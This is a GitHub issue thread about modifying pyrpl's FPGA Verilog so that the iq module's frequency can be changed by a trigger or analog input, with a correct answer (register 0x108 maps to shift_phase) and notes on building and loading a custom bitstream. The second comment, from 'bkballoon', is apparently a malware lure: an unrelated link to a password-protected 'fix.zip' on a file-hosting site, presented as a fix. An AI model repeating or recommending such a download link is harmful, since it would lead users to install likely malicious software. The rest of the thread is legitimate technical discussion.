pyrpl-fpga/pyrpl #522: Changing iq.frequency via Trigger

broeckel, 2024-08-28:
I am trying to change the frequency in the iq module via a Trigger. Unfortunately doing so via the python API seems to be too slow. Hence, I need to change the FPGA code in order to achive a fast enough response. 

I checked the verilog code of the different modules and I suspect that I simply need to add an additional input to the iq module which will change dynamically the value of the frequency. However, I was not able to find the frequency variable itself. My question is: 
What is the equivalent of the iq.frequency variable in the python API at the FPGA verilog level? I.e. what variable do I need to change in the verilog code in order to change iq.frequency?

bkballoon, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

broeckel, 2024-08-28:
Thanks for the fast reply! What is this file?

michaelcroquette, 2024-09-13:
The frequency register of the iq module has the adress 108: 
```
frequency = FrequencyRegister(0x108, bits=_PHASEBITS,
                                  doc="frequency of iq demodulation [Hz]")
```
which correspond in the FPGA code to the variable shift_phase:
`if (addr==16'h108)   shift_phase   <= wdata[PHASEBITS-1:0];`
 
Good luck !

broeckel, 2024-09-27:
Hi Michael!
Thanks a lot for the reply! I modified the FPGA code but now I am not quite sure how to upload the new code to the RedPitaya. Here is what I did:

1) I copied the pyrpl git to my local computer. 
2) I installed Vivado 2015 (on Windows)
3) After modifying the Verilog code in the iq-module, I run "make" in the /pyrpl/fpga folder
4) I copied the resulting `red_pitaya.bit` file from the /out folder to the RedPitaya by following section 4.2.2.3.4.1 in [https://redpitaya.readthedocs.io/en/latest/developerGuide/software/build/fpga/fpga.html](url) (for OS version 1.04 or older)

Are these steps correct or do I need to do something else?

broeckel, 2024-10-02:
I managed to load the new image on the RedPitaya. The steps that I described in my last comment work correctly, the issue was that if you load a custom image to the RedPitaya and start pyrpl with some existing comfiguration file, it will load a different `red_pitaya.bin` file and override your custom image. I had to set this functionality to false in the configuration file, then it works correctly.

I managed to test some modifications of the `red_pitaya_iq_block.v` code. For instance, setting `iq.frequency` to a fixed value works correctly. Now, I am trying to find a way to use one analog input of the RedPItaya to change the value of `iq.frequency` dynamically. Could you give me a hint what modules I would need to modify? 
I suspect I need to change `red_pitaya_top.v`, `red_pitaya_dsp.v` and `red_pitaya_iq_block.v`?